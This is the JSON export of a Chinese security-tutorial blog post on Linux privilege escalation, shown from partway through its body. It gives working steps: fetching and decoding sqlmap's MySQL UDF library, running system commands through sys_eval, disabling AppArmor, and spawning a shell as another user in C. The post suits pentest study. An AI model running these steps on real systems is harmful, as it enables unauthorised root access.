cd \/usr\/share\/sqlmap\/extra\/cloak\/\nsudo python cloak.py -d -i\n\/usr\/share\/sqlmap\/data\/udf\/mysql\/linux\/64\/lib_mysqludf_sys.so_\nlib_mysqludf_sys.so\n\u8fdb\u884c\u89e3\u7801\nwget http:\/\/192.168.0.109\/lib_mysqludf_sys.so<\/code><\/pre>\n
\u67e5\u770b\u6743\u9650\u662f\u5426\u53ef\u5199<\/p>\n
\"1746608323490-77cd9fef-a292-45f4-b48b-ec7ecc451711.png\"<\/p>\n
\u767b\u5f55mysql\u521b\u5efa\u51fd\u6570<\/p>\n
use mysql<\/p>\n
\u521b\u5efa\u51fd\u6570<\/p>\n
create function sys_eval returns string soname \"udf.so\";\nselect sys_eval('id');<\/code><\/pre>\n
\"1746608337163-56e4e4ce-c3ff-48a5-8fb0-bc8644f35fad.png\"<\/p>\n
\u63d0\u6743\u5931\u8d25\u7684\u539f\u56e0<\/p>\n
1.plugin \u4e0d\u5b58\u5728 \u6216\u8005 \u6ca1\u6743\u9650\u5199\u5165\u6587\u4ef6<\/p>\n
2.udf so\u6587\u4ef6 \u7248\u672c\u4e0d\u5bf9<\/p>\n
3.\u8bbe\u7f6e\u6743\u9650<\/p>\n
$ sudo ln -s \/etc\/apparmor.d\/usr.sbin.mysqld \/etc\/apparmor.d\/disable\/\n$ sudo apparmor_parser -R \/etc\/apparmor.d\/usr.sbin.mysqld<\/code><\/pre>\n
\u5207\u6362\u7528\u6237<\/h1>\n
#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\nint main(int argc,char *argv[])\n{\nsetreuid(1000,1000);\nexecve(\"\/bin\/sh\",NULL,NULL);\n}<\/code><\/pre>\n
\n
\u66f4\u65b0: 2025-05-07 16:59:48
\n\u539f\u6587: https:\/\/www.yuque.com\/yuhui.net\/network\/frpdppf62usxsok7<\/a><\/p>\n<\/blockquote>\n","protected":false},"excerpt":{"rendered":"
Linux\u63d0\u6743 \u5e38\u7528\u547d\u4ee4 uname -a #\u67e5\u770b\u5185\u6838\/\u64cd\u4f5c\u7cfb\u7edf\/cpu\u4fe1\u606f hend -n 1 \/etc\/issue #\u67e5\u770b\u64cd\u4f5c\u7cfb\u7edf\u7248\u672c cat \/proc\/version #\u67e5\u770b\u7cfb\u7edf\u4fe1\u606f hostname #\u67e5\u770b\u8ba1\u7b97\u673a\u540d env #\u67e5\u770b\u73af\u5883\u53d8\u91cf ifconfig #\u67e5\u770b\u7f51\u5361 netstat -lntp # \u67e5\u770b\u6240\u6709\u76d1\u542c\u7aef\u53e3 netstat -antp # \u67e5\u770b\u6240\u6709\u5df2\u7ecf\u5efa\u7acb\u7684\u8fde\u63a5 netstat […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[123,119,2],"tags":[17,22,28,29,43],"class_list":["post-791","post","type-post","status-publish","format-standard","hentry","category-tiquan","category-shentouceshijichu-network_sec","category-network_sec","tag-github","tag-windows","tag-kali","tag-java","tag-43"],"_links":{"self":[{"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/posts\/791","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/comments?post=791"}],"version-history":[{"count":0,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/posts\/791\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/media?parent=791"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/categories?post=791"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/tags?post=791"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}